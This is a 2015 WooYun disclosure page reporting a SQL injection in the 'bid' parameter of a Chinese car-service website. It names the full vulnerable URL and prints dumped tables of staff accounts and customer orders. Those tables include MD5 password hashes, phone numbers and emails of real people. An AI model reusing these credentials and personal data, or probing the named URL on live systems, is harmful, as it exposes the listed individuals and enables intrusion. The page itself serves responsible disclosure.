当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139514

漏洞标题:有壹手某站SQL注入(5万员工/4万客户订单信息泄露)

相关厂商:北京有壹手汽车科技有限公司

漏洞作者: 深度安全实验室

提交时间:2015-09-07 14:33

修复时间:2015-10-22 14:42

公开时间:2015-10-22 14:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-07: 细节已通知厂商并且等待厂商处理中
2015-09-07: 厂商已经确认,细节仅向厂商公开
2015-09-17: 细节向核心白帽子及相关领域专家公开
2015-09-27: 细节向普通白帽子公开
2015-10-07: 细节向实习白帽子公开
2015-10-22: 细节向公众公开

简要描述:

rt

详细说明:

有壹手如下连接存在sql注入,其中,bid参数有问题

http://www.y1s.cn/index.php?a=waterfallload&bid=1&g=home&m=case&p=1&sid=-1&zid=-1&_=1441387377969

youyishou1.jpg


漏洞证明:

以imeiche库为例,发现179个表

youyishoubiao.jpg


47527员工信息泄露

youyishoubiaouser.jpg


Database: imeiche
Table: imc_user
[50 entries]
+----+------------------+----------------------------------+---------------+-------------------+----------------------------------+------------------+
| id | account          | password                         | mobile_number | email             | qq_openid                        | sinaweibo_openid |
+----+------------------+----------------------------------+---------------+-------------------+----------------------------------+------------------+
| 1  | wing             | 9a952cd91000872a8d7d1f5ee0c87317 | 13476136590   | wing8192@sina.com | AFBAE8CD322359B2847E86BA57FDD8C6 | 1459927493       |
| 7  | 黑子               | e10adc3949ba59abbe56e057f20f883e |               |                   | A2938E0EF1EB8D0138B597C52A488A8B |                  |
| 8  | yangcheng        | 96e79218965eb72c92a549dd5a330112 |               |                   |                                  |                  |
| 9  | yangcheng2       | e10adc3949ba59abbe56e057f20f883e |               |                   | 827C194F29CDE558054C45CB124108D9 |                  |
| 10 | Alex             | 1886372518e402473f0c37503903c85c | 18601209378   | 10813108@qq.com   |                                  | 1936172077       |
| 11 | 天地一叶             | e10adc3949ba59abbe56e057f20f883e | 18600737727   |                   | 45B0FDA31D500C58FA2008F18E43CA70 |                  |
| 12 |                  | e10adc3949ba59abbe56e057f20f883e |               |                   | 40350121F7B72ED4AD0E4BA393762E21 |                  |
| 13 | beatlescom       | 8b48e801868476f4506aeca991194916 | 13910927277   | m@junyuetuan.org  |                                  |                  |
| 14 | pip617           | abd7372bba55577590736ef6cb3533c6 | 13810285057   |                   |                                  |                  |
| 15 | 759669120@qq.com | fe699c19ece07ad51b936e24f39136c2 | 13050493337   |                   |                                  |                  |
| 16 | teiryu           | ed7ea8b6c8052c827b31b331afca219f | 18618166508   |                   |                                  |                  |
| 17 | adeon            | acd6af631dfc709ada070b5d0e0d23a4 | 13466520861   |                   |                                  |                  |
| 18 |                  | e10adc3949ba59abbe56e057f20f883e |               |                   | 8AA65992980B81410096C25187E121EE |                  |
| 19 | 霸王别鸡             | fcea920f7412b5da7be0cf42b8c93759 | 13575411868   |                   |                                  |                  |
| 20 | 234-续夜           | 25ef754a752450c761f053e4b16bd542 | 13932670222   |                   |                                  |                  |
| 21 |                  | e10adc3949ba59abbe56e057f20f883e |               |                   | 993F16E0B932431C6A0AF56AD32B1300 |                  |
| 22 | 后会有妻             | af97476ecbd8b52a52d5c549e0a9bcd9 | 13520400150   |                   |                                  |                  |
| 23 |                  | e10adc3949ba59abbe56e057f20f883e |               |                   | AD8DF4CF71A44BA7AFC8EBD8FA956931 |                  |
| 24 | movingstar       | e10adc3949ba59abbe56e057f20f883e | 13336589523   |                   |                                  |                  |
| 25 | a1104201         | 563e2f9595a2f8fda8caf91e607820b9 | 13141405942   |                   |                                  |                  |
| 26 | admin            | e10adc3949ba59abbe56e057f20f883e | 13344444444   |                   |                                  |                  |
| 27 | 123              | e10adc3949ba59abbe56e057f20f883e | 13345678910   |                   |                                  |                  |
| 28 | tasfsdfsf        | e10adc3949ba59abbe56e057f20f883e | 24234234      |                   |                                  |                  |
| 29 | blackdogmc       | 32f52a796b5d1521c10df41e79a69e01 | 13810429173   | 491761132@qq.com  |                                  |                  |
| 30 | youqiwei         | 95d65020c3c29e5f6b849c4f66295eae | 13681193177   |                   |                                  |                  |
| 31 | nfsse            | 8c09fb8c4424154bea2207db6ee90997 |               |                   |                                  |                  |
| 32 | 李建博测试            | 5d5d6b09bfb5f4ca9889630347ee2d71 | 13681559570   |                   |                                  |                  |
| 33 | idollie          | c0fb6c30e4142074c718c66b7823d007 | 18571519110   |                   |                                  |                  |
| 34 | cyz2817          | 798742d5e12a0304eba2be103529ada6 | 13705599168   |                   |                                  |                  |
| 35 | qcsdtt           | ac5d64c703745df40cb2bc177122c354 | 13840868612   |                   |                                  |                  |
| 36 | 27924927         | 48724fa00401358467e998445ca025f3 | 18001027228   |                   |                                  |                  |
| 37 | 未知姓名             | 8598ec2004fc9962f4ed6065b5428be0 | 18611920790   |                   |                                  |                  |
| 38 | 王修超              | 9b67eccfbb917b03da273608aae98e7b | 13911313667   |                   |                                  |                  |
| 39 |                  | e10adc3949ba59abbe56e057f20f883e |               |                   | 0063431ED149911159EE08D28C3BD095 |                  |
| 40 | blackwhite       | 980ac217c6b51e7dc41040bec1edfec8 | 13801210751   |                   |                                  |                  |
| 41 | 有壹手快修天通苑店        | d7b0819e2b01fdd5a0d3c019184c52c8 | 18611686463   |                   |                                  |                  |
| 42 | 刘泽云              | ef3008430b2445bcc038dacce358a005 | 18610553159   |                   |                                  |                  |
| 43 | chilam519        | a885e594d6750979d7a7bfa9d27b7328 | 13566643535   |                   |                                  |                  |
| 44 | free0525         | 4456672a2ee54562c625553da153b58f | 13311167718   |                   |                                  |                  |
| 45 | 唐先生先生            | 8d758b812fa8b1a65fef71cf711ef846 | 18811181317   |                   |                                  |                  |
| 46 | goldok           | dd51c8d09e819e03256d08bb894ae3d3 | 18611703820   |                   |                                  |                  |
| 47 | 13988188279      | fda73ffb30753a935864824b4efe7177 | 13988188279   |                   |                                  |                  |
| 48 | vactowb          | cab4722746e4d725a3b7c479efa99659 | 18601046936   |                   |                                  |                  |
| 49 | idbuxing         | 95447b2a5c824b8f0b928e59218bbd77 | 13521730109   |                   |                                  |                  |
| 50 | zhujiahua        | d5eeb237e8fffcd393e90413d488efa9 | 13522951799   |                   |                                  |                  |
| 51 | tianxinghan      | 5782a6811a706ca640c55c98cafe3f62 | 13581829666   |                   |                                  |                  |
| 52 | savior_pk        | 3173a8c9c5efabe0a33926b5e37b62ce | 18511665531   | 317909561@163.com |                                  |                  |
| 53 | laokong999       | bcaed309bb3ace5af45bfb94c77e83d8 | 18911799097   |                   |                                  |                  |
| 54 | octair           | 26b4ec454ba458df9d64f1c92891a937 | 18905509253   |                   |                                  |                  |
| 55 | zxheng           | 8c3aa979fc9ac8c58dfcb1441392d839 | 18611115887   |                   |                                  |                  |
+----+------------------+----------------------------------+---------------+-------------------+----------------------------------+------------------+


43068客户订单信息泄露

youyishoubiaoc.jpg

Database: imeiche
Table: imc_consumer_details
[50 entries]
+----+--------------+--------------+------------------+-------------+----------+-------------+
| id | operate_user | xf_zone_name | xf_business_name | ordernumber | paymoney | productname |
+----+--------------+--------------+------------------+-------------+----------+-------------+
| 2  | admin        | 有壹手京密路店      | 有壹手              | 1201        | 333.00   | A-前保险杠右侧    |
| 3  | admin        | 有壹手京密路店      | 有壹手              | 1201        | 333.00   | A-前保险杠右侧    |
| 5  | adlzb        | 艾多丽酷车小镇店     | 艾多丽              | 1208        | 699.00   | O-前车盖全喷     |
| 6  | adlzb        | 艾多丽酷车小镇店     | 艾多丽              | 1210        | 99.00    | 全车手工多丽洗     |
| 7  | adlzb        | 艾多丽酷车小镇店     | 艾多丽              | 1210        | 499.00   | E-前翼子板右侧    |
| 8  | adlzb        | 艾多丽酷车小镇店     | 艾多丽              | 1210        | 499.00   | F-前翼子板左侧    |
| 9  | adlzb        | 艾多丽酷车小镇店     | 艾多丽              | 1210        | 499.00   | L-后车门左侧     |
| 10 | adlzb        | 艾多丽酷车小镇店     | 艾多丽              | 1211        | 389.00   | 多丽洗全车内饰桑拿   |
| 11 | 胡亿兆          | 艾多丽酷车小镇店     | 艾多丽              | 2           | 44       | 玻璃水         |
| 12 | admin        | 快修京密路中心店     | 有壹手              | 4           | 111      | 123         |
| 18 | admin        | 京密路中心店       | 有壹手              | 1276        | 399.00   | A-前保险杠右侧    |
| 19 | y1sbyd       | 北苑专业店        | 有壹手              | 14          | 8.00     | 极美手工洗车      |
| 20 | y1sbyd       | 北苑专业店        | 有壹手              | 15          | 59.00    | 极美手工洗车      |
| 21 | y1sbyd       | 北苑专业店        | 有壹手              | 17          | 30.00    | 极美手工洗车      |
| 22 | y1sbyd       | 北苑专业店        | 有壹手              | 19          | 30.00    | 极美手工洗车      |
| 23 | y1sbyd       | 北苑专业店        | 有壹手              | 18          | 30.00    | 极美手工洗车      |
| 24 | y1sbyd       | 北苑专业店        | 有壹手              | 20          | 30.00    | 极美手工洗车      |
| 25 | y1sbyd       | 北苑专业店        | 有壹手              | 21          | 59       | 极美手工洗车      |
| 26 | y1sbyd       | 北苑专业店        | 有壹手              | 22          | 30       | 极美手工洗车      |
| 27 | y1sbyd       | 北苑专业店        | 有壹手              | 23          | 30.00    | 极美手工洗车      |
| 28 | y1sbyd       | 北苑专业店        | 有壹手              | 25          | 59.00    | 极美手工洗车      |
| 29 | y1sbyd       | 北苑专业店        | 有壹手              | 26          | 30.00    | 极美手工洗车      |
| 30 | y1sbyd       | 北苑专业店        | 有壹手              | 27          | 59.00    | 极美手工洗车      |
| 31 | y1sbyd       | 北苑专业店        | 有壹手              | 24          | 30.00    | 极美手工洗车      |
| 32 | y1sbyd       | 北苑专业店        | 有壹手              | 1278        | 300.00   | 汽宝水晶镀膜      |
| 33 | y1sbyd       | 北苑专业店        | 有壹手              | 30          | 59.00    | 极美手工洗车      |
| 34 | y1sbyd       | 北苑专业店        | 有壹手              | 31          | 30.00    | 极美手工洗车      |
| 35 | y1sbyd       | 北苑专业店        | 有壹手              | 32          | 30.00    | 极美手工洗车      |
| 36 | y1sbyd       | 北苑专业店        | 有壹手              | 29          | 99.00    | 极美手工精洗      |
| 37 | y1sbyd       | 北苑专业店        | 有壹手              | 35          | 99       | 极美手工精洗      |
| 38 | y1sbyd       | 北苑专业店        | 有壹手              | 34          | 30.00    | 极美手工洗车      |
| 39 | y1sbyd       | 北苑专业店        | 有壹手              | 36          | 30.00    | 极美手工洗车      |
| 40 | y1sbyd       | 北苑专业店        | 有壹手              | 37          | 30       | 极美手工洗车      |
| 41 | y1sbyd       | 北苑专业店        | 有壹手              | 38          | 30.00    | 极美手工洗车      |
| 42 | y1sbyd       | 北苑专业店        | 有壹手              | 39          | 30       | 极美手工洗车      |
| 43 | y1sbyd       | 北苑专业店        | 有壹手              | 40          | 30       | 极美手工洗车      |
| 44 | y1sbyd       | 北苑专业店        | 有壹手              | 41          | 30       | 极美手工洗车      |
| 45 | y1sbyd       | 北苑专业店        | 有壹手              | 33          | 30.00    | 极美手工洗车      |
| 46 | y1sbyd       | 北苑专业店        | 有壹手              | 42          | 69       | 极美手工精洗      |
| 47 | y1sbyd       | 北苑专业店        | 有壹手              | 43          | 30       | 极美手工洗车      |
| 48 | y1sbyd       | 北苑专业店        | 有壹手              | 44          | 30       | 极美手工洗车      |
| 49 | y1sbyd       | 北苑专业店        | 有壹手              | 45          | 60       | 极美手工洗车      |
| 50 | y1sbyd       | 北苑专业店        | 有壹手              | 46          | 30       | 极美手工洗车      |
| 51 | y1sbyd       | 北苑专业店        | 有壹手              | 47          | 30       | 极美手工洗车      |
| 52 | y1sbyd       | 北苑专业店        | 有壹手              | 48          | 59       | 极美手工洗车      |
| 53 | y1sbyd       | 北苑专业店        | 有壹手              | 1279        | 359.00   | D-后保险杠左侧    |
| 54 | y1sbyd       | 北苑专业店        | 有壹手              | 1277        | 299.00   | K-后车门右侧     |
| 55 | y1sbyd       | 北苑专业店        | 有壹手              | 1277        | 0.00     | B-钣金        |
| 56 | y1sbyd       | 北苑专业店        | 有壹手              | 1277        | 199.00   | A-前保险杠右侧    |
| 57 | y1sbyd       | 北苑专业店        | 有壹手              | 1277        | 199.00   | E-前翼子板右侧    |
+----+--------------+--------------+------------------+-------------+----------+-------------+


修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-07 14:40

厂商回复:

感谢对有壹手的关注。谢谢。

最新状态:

暂无

漏洞评价:

评论